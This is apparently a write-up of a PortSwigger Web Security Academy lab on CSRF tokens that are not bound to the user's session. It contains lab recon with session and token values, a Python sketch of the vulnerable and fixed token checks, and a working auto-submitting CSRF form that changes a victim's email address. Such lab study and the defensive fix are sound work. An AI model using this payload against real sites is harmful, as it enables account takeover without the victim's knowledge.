Lab: CSRF where token is not tied to user session

tags: Portswigger Web Security Academy Web
  • Description: This lab’s email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren’t integrated into the site’s session handling system.
  • Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address. You have two accounts on the application that you can use to help design your attack. The credentials are as follows: wiener:peter carlos:montoya

Background

A CSRF token must be tied to the user's session. If it is not, an attacker can obtain a valid token from their own session and use it to forge a state-changing request for another user.

Recon

  1. Username: wiener; Session: l3IjqV4KRDAmncviJTvP80KK3RAHDJLG; CSRF Token: u4wMMtIhhUoTlc2LgadJFNRKOZ6bFAZr

  2. Username: carlos; Session: Goc2H2lmU9Ki7Of4IcOWpE4XFNMWFslR; CSRF Token: UGabdiPPbGaTLsSa8vOV6MfBEvi2nGQ3

  3. What if we swap the session cookie or the csrf token between the two accounts? The request is still accepted, which means the server does not bind each csrf token to the session it was issued to.
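The check the lab's server is missing, written here as an added example rather than the lab's own code: a minimal in-memory token store with the vulnerable "any unused token is accepted" verification next to one that binds each token to the session it was issued to. Session identifiers are constructed sample values.

```python
import hmac
import secrets


class CsrfTokenStore:
    """Hypothetical single-use token store; mirrors the lab, where an
    intercepted but never-submitted token stays valid until consumed."""

    def __init__(self):
        self._tokens = {}  # token -> session id the token was issued to

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(24)
        self._tokens[token] = session_id
        return token

    def verify_unbound(self, token: str) -> bool:
        """Vulnerable check: any unused token passes, whoever it was issued to."""
        return self._tokens.pop(token, None) is not None

    def verify_bound(self, session_id: str, token: str) -> bool:
        """Fixed check: the token must belong to the session making the request."""
        owner = self._tokens.get(token)
        if owner is None or not hmac.compare_digest(owner, session_id):
            return False
        del self._tokens[token]  # still single-use
        return True


def cross_session_accepted(bound: bool) -> bool:
    """Token harvested from the attacker's own session, submitted in a request
    that carries the victim's session cookie. Returns True if accepted."""
    store = CsrfTokenStore()
    attacker_session = "SESSION-WIENER"  # constructed sample value
    victim_session = "SESSION-CARLOS"    # constructed sample value
    harvested = store.issue(attacker_session)  # intercepted, never submitted
    if bound:
        return store.verify_bound(victim_session, harvested)
    return store.verify_unbound(harvested)


def own_session_accepted() -> bool:
    """Legitimate flow under the fixed check: token used by its own session."""
    store = CsrfTokenStore()
    session = "SESSION-CARLOS"  # constructed sample value
    token = store.issue(session)
    return store.verify_bound(session, token)
```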

Exp

Replace the csrf token in the request with a token intercepted by Burp Suite and never submitted, so it is still unused. Because the server does not bind the token to a session, the same token is accepted in a forged request made with another user's session, which achieves CSRF. Exploit Payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://0a5200320345733f806803640046007d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="danger&#64;gmail&#46;com" />
      <input type="hidden" name="csrf" value="u4wMMtIhhUoTlc2LgadJFNRKOZ6bFAZr" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Success Screenshot: (image not included)
